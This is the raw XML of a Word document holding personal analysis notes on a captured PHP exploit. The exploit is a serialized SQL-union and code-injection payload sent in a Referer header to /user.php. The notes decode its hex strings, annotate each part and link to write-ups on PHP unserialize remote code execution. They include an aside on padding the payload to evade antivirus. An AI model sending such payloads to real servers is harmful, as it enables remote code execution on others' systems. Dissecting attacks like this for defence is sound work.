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AEBCB" w14:textId="65EA064A" w:rsidR="00C46E88" w:rsidRDefault="00C46E88" w:rsidP="00C46E88">
      <w:r>
        <w:t>select 1,</w:t>
      </w:r>
      <w:r w:rsidRPr="00C46E88">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>0x2720756e696f6e2f2a</w:t>
      </w:r>
      <w:r>
        <w:t>,3,4,5,6,7,8,</w:t>
      </w:r>
      <w:r w:rsidRPr="00C46E88">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>0x7b247b24524345275d3b6469652f2a2a2f286d6435284449524543544f52595f534550415241544f5229293b2f2f7d7d</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00C46E88">
        <w:rPr>
          <w:highlight w:val="magenta"/>
        </w:rPr>
        <w:t>0--</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>";s</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>:2:"id";s:9:"' union/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68947288" w14:textId="77777777" w:rsidR="00C46E88" w:rsidRDefault="00C46E88" w:rsidP="00C46E88"/>
    <w:p w14:paraId="21FAB68E" w14:textId="5E003CD7" w:rsidR="00C46E88" w:rsidRDefault="00C46E88" w:rsidP="00C46E88">
      <w:r>
        <w:t xml:space="preserve">select 1, </w:t>
      </w:r>
      <w:r w:rsidRPr="00C46E88">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>' union/*</w:t>
      </w:r>
      <w:r>
        <w:t>,3,4,5,6,7,8</w:t>
      </w:r>
      <w:r w:rsidRPr="00C46E88">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>,{${$RCE'];die/**/(md5(DIRECTORY_SEPERATOR));//}}</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00C46E88">
        <w:rPr>
          <w:highlight w:val="magenta"/>
        </w:rPr>
        <w:t>0--</w:t>
      </w:r>
      <w:r>
        <w:t>";s:2:"id";s:9:"' union/";s:4:"name";s:3:"ads";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3A35B0" w14:textId="77777777" w:rsidR="00C46E88" w:rsidRDefault="00C46E88" w:rsidP="00C46E88"/>
    <w:p w14:paraId="6EC3C8E2" w14:textId="42450AA4" w:rsidR="00E031CF" w:rsidRDefault="00C46E88" w:rsidP="00C46E88">
      <w:r>
        <w:t>{${$RCE'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>];die</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>/**/(md5(DIRECTORY_SEPERATOR));//}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB6133C" w14:textId="7D0CE6F2" w:rsidR="00C46E88" w:rsidRDefault="00C46E88" w:rsidP="00C46E88"/>
    <w:p w14:paraId="7304BF62" w14:textId="0B87AF14" w:rsidR="00C46E88" w:rsidRDefault="00C46E88" w:rsidP="00C46E88">
      <w:r w:rsidRPr="00C46E88">
        <w:rPr>
          <w:highlight w:val="magenta"/>
        </w:rPr>
        <w:t>0--</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = means comment in SQL statement. </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00C46E88">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>link</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F54503B" w14:textId="1096C998" w:rsidR="00C46E88" w:rsidRDefault="00C46E88" w:rsidP="00C46E88"/>
    <w:p w14:paraId="7F356848" w14:textId="3EEE9C79" w:rsidR="00A3617B" w:rsidRDefault="00A3617B" w:rsidP="00C46E88"/>
    <w:p w14:paraId="62F5B3C8" w14:textId="06FEFA18" w:rsidR="00A3617B" w:rsidRDefault="00A3617B" w:rsidP="00C46E88">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="209F77F5" w14:textId="20C9AB07" w:rsidR="00A3617B" w:rsidRDefault="00A3617B" w:rsidP="00C46E88"/>
    <w:p w14:paraId="73B2E7C8" w14:textId="3172E55C" w:rsidR="00A3617B" w:rsidRDefault="00A3617B" w:rsidP="00C46E88"/>
    <w:p w14:paraId="1FD5BE16" w14:textId="5EFC0538" w:rsidR="00A3617B" w:rsidRDefault="00A3617B" w:rsidP="00C46E88">
      <w:r w:rsidRPr="00A3617B">
        <w:t>select 1,</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3617B">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>0x2720756e696f6e2f2a</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3617B">
        <w:t>,3,4,5,6,7,8,</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3617B">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>0x7b247b24524345275d3b6469652f2a2a2f286d6435284449524543544f52595f534550415241544f5229293b2f2f7d7d</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3617B">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00730F67">
        <w:rPr>
          <w:highlight w:val="magenta"/>
        </w:rPr>
        <w:t>0--</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A3617B">
        <w:t>";s</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A3617B">
        <w:t>:2:"id";s:9:"' union/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0561127C" w14:textId="780ECA0D" w:rsidR="00A3617B" w:rsidRDefault="00A3617B" w:rsidP="00C46E88"/>
    <w:p w14:paraId="6A6A5EF7" w14:textId="0DCA0885" w:rsidR="00A3617B" w:rsidRDefault="00A3617B" w:rsidP="00C46E88"/>
    <w:p w14:paraId="1AB5812E" w14:textId="4029714A" w:rsidR="00A3617B" w:rsidRDefault="00A3617B" w:rsidP="00C46E88"/>
    <w:p w14:paraId="10EC0AD6" w14:textId="57242B4D" w:rsidR="00A3617B" w:rsidRDefault="00A3617B" w:rsidP="00C46E88">
      <w:r w:rsidRPr="00A3617B">
        <w:t xml:space="preserve">select 1, </w:t>
      </w:r>
      <w:r w:rsidRPr="00A3617B">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>' union/*</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3617B">
        <w:t xml:space="preserve">,3,4,5,6,7,8, </w:t>
      </w:r>
      <w:r w:rsidRPr="00A3617B">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>{${$RCE'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A3617B">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>];die</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A3617B">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>/**/(md5(DIRECTORY_SEPARATOR));//}}</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3617B">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00730F67">
        <w:rPr>
          <w:highlight w:val="magenta"/>
        </w:rPr>
        <w:t>0--</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3617B">
        <w:t>";s:2:"id";s:9:"' union/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219DFDB8" w14:textId="5F1F11EA" w:rsidR="00730F67" w:rsidRDefault="00730F67" w:rsidP="00C46E88"/>
    <w:p w14:paraId="45FF15D3" w14:textId="77777777" w:rsidR="00730F67" w:rsidRDefault="00730F67" w:rsidP="00C46E88"/>
    <w:p w14:paraId="14FA3DBC" w14:textId="77777777" w:rsidR="00730F67" w:rsidRDefault="00730F67" w:rsidP="00730F67">
      <w:r w:rsidRPr="00C46E88">
        <w:rPr>
          <w:highlight w:val="magenta"/>
        </w:rPr>
        <w:t>0--</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = means comment in SQL statement. </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00C46E88">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>link</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4174319F" w14:textId="67301BB6" w:rsidR="00730F67" w:rsidRDefault="00730F67" w:rsidP="00C46E88"/>
    <w:p w14:paraId="3BA3F5ED" w14:textId="449882A8" w:rsidR="00E66449" w:rsidRDefault="00E66449" w:rsidP="00C46E88">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C1E0F2D" w14:textId="083929FC" w:rsidR="0030442E" w:rsidRDefault="0030442E" w:rsidP="0030442E">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="140C6CF6" w14:textId="5D241828" w:rsidR="0030442E" w:rsidRDefault="0030442E" w:rsidP="00C46E88"/>
    <w:p w14:paraId="4F8DC6BF" w14:textId="52A66815" w:rsidR="000E2929" w:rsidRPr="000E2929" w:rsidRDefault="000E2929" w:rsidP="000E2929">
      <w:r w:rsidRPr="000E2929">
        <w:t xml:space="preserve">POST </w:t>
      </w:r>
      <w:r w:rsidR="00C5786E" w:rsidRPr="00641BC4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/%75%73%65%72%2e%70%68%70</w:t>
      </w:r>
      <w:r w:rsidR="00C5786E" w:rsidRPr="00C5786E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000E2929">
        <w:t>HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8DC6BF" w14:textId="52A66815" w:rsidR="000E2929" w:rsidRPr="000E2929" w:rsidRDefault="000E2929" w:rsidP="000E2929">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E2929">
        <w:t>Referer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E2929">
        <w:t>: 45ea207d7a2b68c49582d2d22adf953aads|</w:t>
      </w:r>
      <w:r w:rsidRPr="000E2929">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>a:3:{s:3:"num";s:147:"/ select 1,0x2720756e696f6e2f2a,3,4,5,6,7,8,0x7b247b24524345275d3b6469652f2a2a2f286d6435284449524543544f52595f534550415241544f5229293b2f2f7d7d,0--";s:2:"id";s:9:"' union/";s:4:"name";s:3:"ads";}</w:t>
      </w:r>
      <w:r w:rsidRPr="000E2929">
        <w:t>45ea207d7a2b68c49582d2d22adf953a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBF9C95" w14:textId="6DE6E91A" w:rsidR="000E2929" w:rsidRDefault="000E2929" w:rsidP="00C46E88"/>
    <w:p w14:paraId="57C84DD0" w14:textId="7E48E4BE" w:rsidR="00E66449" w:rsidRDefault="00E66449" w:rsidP="00E66449"/>
    <w:p w14:paraId="4D7C364C" w14:textId="2A1587DB" w:rsidR="00641BC4" w:rsidRDefault="00641BC4" w:rsidP="00641BC4">
      <w:r w:rsidRPr="00641BC4">
        <w:t xml:space="preserve">POST </w:t>
      </w:r>
      <w:r w:rsidRPr="00641BC4">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00641BC4">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>user.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00641BC4">
        <w:t xml:space="preserve"> HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E37F874" w14:textId="77777777" w:rsidR="00641BC4" w:rsidRDefault="00641BC4" w:rsidP="00E66449"/>
    <w:p w14:paraId="589757B9" w14:textId="09D58246" w:rsidR="00641BC4" w:rsidRDefault="00641BC4" w:rsidP="00E66449">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E2929">
        <w:t>Referer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E2929">
        <w:t>: 45ea207d7a2b68c49582d2d22adf953aads|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF35AA5" w14:textId="77777777" w:rsidR="00641BC4" w:rsidRDefault="00641BC4" w:rsidP="00E66449"/>
    <w:p w14:paraId="26D05FB8" w14:textId="7443656F" w:rsidR="00E66449" w:rsidRDefault="00E66449" w:rsidP="00E66449">
      <w:r>
        <w:t>a:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>3:{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7EE3984F" w14:textId="77777777" w:rsidR="00E66449" w:rsidRDefault="00E66449" w:rsidP="00E66449">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>s:3:"num";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12127D1F" w14:textId="77777777" w:rsidR="00E66449" w:rsidRDefault="00E66449" w:rsidP="00E66449">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0324AFBC" w14:textId="42F88B00" w:rsidR="00E66449" w:rsidRDefault="00E66449" w:rsidP="00E66449">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">s:147:"/ </w:t>
      </w:r>
      <w:r w:rsidR="00263856" w:rsidRPr="00263856">
        <w:t>select 1, ' union/*,3,4,5,6,7,</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00263856" w:rsidRPr="00263856">
        <w:t>8,{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00263856" w:rsidRPr="00263856">
        <w:t>${$RCE'];die</w:t>
      </w:r>
      <w:r w:rsidR="00263856" w:rsidRPr="00566713">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/**/(md5(DIRECTORY_SEPERATOR));//</w:t>
      </w:r>
      <w:r w:rsidR="00263856" w:rsidRPr="00263856">
        <w:t>}},</w:t>
      </w:r>
      <w:r>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26661B65" w14:textId="77777777" w:rsidR="00E66449" w:rsidRDefault="00E66449" w:rsidP="00E66449">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D5AB121" w14:textId="77777777" w:rsidR="00E66449" w:rsidRDefault="00E66449" w:rsidP="00E66449">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>s:2:"id";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E506D5D" w14:textId="77777777" w:rsidR="00E66449" w:rsidRDefault="00E66449" w:rsidP="00E66449">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="177DBDB0" w14:textId="2D45801C" w:rsidR="00E66449" w:rsidRDefault="00E66449" w:rsidP="00E66449">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>s:9:"' union/";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11655D86" w14:textId="77777777" w:rsidR="00E66449" w:rsidRDefault="00E66449" w:rsidP="00E66449">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A39B883" w14:textId="77777777" w:rsidR="00E66449" w:rsidRDefault="00E66449" w:rsidP="00E66449">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>s:4:"name";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C56413" w14:textId="77777777" w:rsidR="00E66449" w:rsidRDefault="00E66449" w:rsidP="00E66449">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1357F2EF" w14:textId="77777777" w:rsidR="00E66449" w:rsidRDefault="00E66449" w:rsidP="00E66449">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>s:3:"ads";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3D6DF4" w14:textId="77777777" w:rsidR="00E66449" w:rsidRDefault="00E66449" w:rsidP="00E66449">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="744F774D" w14:textId="012F0763" w:rsidR="00E66449" w:rsidRDefault="00E66449" w:rsidP="00E66449">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043B248E" w14:textId="7165273B" w:rsidR="00641BC4" w:rsidRDefault="00641BC4" w:rsidP="00E66449">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="000E2929">
        <w:t>45ea207d7a2b68c49582d2d22adf953a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A571C44" w14:textId="1AE42E9A" w:rsidR="00566713" w:rsidRDefault="00566713" w:rsidP="00566713">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EDC91E0" w14:textId="77777777" w:rsidR="00566713" w:rsidRDefault="00566713" w:rsidP="00E66449">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F978C8A" w14:textId="1F756DCB" w:rsidR="0030442E" w:rsidRDefault="00566713" w:rsidP="00E66449">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="00566713">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>/**/(md5(DIRECTORY_SEPERATOR</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00566713">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>));/</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00566713">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = This could be added to evade AV.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4236AED2" w14:textId="46DD9611" w:rsidR="00566713" w:rsidRDefault="00566713" w:rsidP="00E66449">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DD2D39B" w14:textId="77777777" w:rsidR="00566713" w:rsidRDefault="00566713" w:rsidP="00E66449">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A20B8DF" w14:textId="5461483C" w:rsidR="0030442E" w:rsidRDefault="0030442E" w:rsidP="00E66449"/>
    <w:p w14:paraId="331CFE23" w14:textId="7A4E6478" w:rsidR="0030442E" w:rsidRDefault="0030442E" w:rsidP="00E66449"/>
    <w:p w14:paraId="4CE0B5D1" w14:textId="41019B1E" w:rsidR="001C37D9" w:rsidRDefault="0030442E" w:rsidP="001C37D9">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0030442E">
        <w:t>unserialization</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0030442E">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0030442E">
        <w:t>) is the opposite of serialize(). It takes a serialized string and converts it back to an array object.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0030442E">
        <w:t>Un-serialization can result in code being loaded and executed due to object instantiation and auto loading.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A8935B" w14:textId="5F29F282" w:rsidR="00D57B9E" w:rsidRDefault="00D57B9E" w:rsidP="001C37D9"/>
    <w:p w14:paraId="360523DD" w14:textId="77777777" w:rsidR="00D57B9E" w:rsidRPr="00D57B9E" w:rsidRDefault="00D57B9E" w:rsidP="00D57B9E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">POC = </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00D57B9E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="x-none"/>
          </w:rPr>
          <w:t xml:space="preserve">PHP Object Injection &amp; Serialization Vulnerabilities by </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00D57B9E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="x-none"/>
          </w:rPr>
          <w:t>MakMan</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="67494728" w14:textId="0BBE419F" w:rsidR="00D57B9E" w:rsidRDefault="00D57B9E" w:rsidP="00D57B9E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Other blog = </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="00D57B9E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.notsosecure.com/remote-code-execution-via-php-unserialize/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1CE83852" w14:textId="655D2B8A" w:rsidR="00DF0409" w:rsidRDefault="00DF0409" w:rsidP="00DF0409">
      <w:pPr>
        <w:ind w:left="360" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="425C4A90" w14:textId="77777777" w:rsidR="00DF0409" w:rsidRDefault="00DF0409" w:rsidP="00DF0409">
      <w:pPr>
        <w:ind w:left="360" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7712444F" w14:textId="12D38EA7" w:rsidR="001C37D9" w:rsidRDefault="001C37D9" w:rsidP="001C37D9">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CDCF4E9" w14:textId="77777777" w:rsidR="001C37D9" w:rsidRDefault="001C37D9" w:rsidP="001C37D9"/>
    <w:p w14:paraId="0827C81C" w14:textId="73FD5672" w:rsidR="0030442E" w:rsidRDefault="0030442E" w:rsidP="0030442E">
      <w:r w:rsidRPr="0030442E">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58EA5BB5" wp14:editId="49B4265A">
            <wp:extent cx="3833813" cy="3545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001" cy="356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0698B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="685AC7FC"/>
    <w:lvl w:ilvl="0" w:tplc="CDF6D7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AE2"/>
    <w:rsid w:val="000C25D0"/>
    <w:rsid w:val="000E2929"/>
    <w:rsid w:val="001C37D9"/>
    <w:rsid w:val="00242F7F"/>
    <w:rsid w:val="00263856"/>
    <w:rsid w:val="0030442E"/>
    <w:rsid w:val="0040614D"/>
    <w:rsid w:val="00566713"/>
    <w:rsid w:val="00641BC4"/>
    <w:rsid w:val="00730F67"/>
    <w:rsid w:val="00A3617B"/>
    <w:rsid w:val="00C46E88"/>
    <w:rsid w:val="00C5786E"/>
    <w:rsid w:val="00CD07CB"/>
    <w:rsid w:val="00D57B9E"/>
    <w:rsid w:val="00DF0409"/>
    <w:rsid w:val="00E031CF"/>
    <w:rsid w:val="00E66449"/>
    <w:rsid w:val="00F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50CAB"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{306B0547-2BD1-4EEC-B384-8680942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E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E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44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7B9E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D57B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sosecure.com/remote-code-execution-via-php-unserializ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TXMFrc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9098655/how-can-i-add-comments-in-my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9098655/how-can-i-add-comments-in-mysq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takshil patil</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>takshil patil</cp:lastModifiedBy>
  <cp:revision>23</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-05-27T09:20:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-05-27T10:55:00Z</dcterms:modified>
</cp:coreProperties>
</file>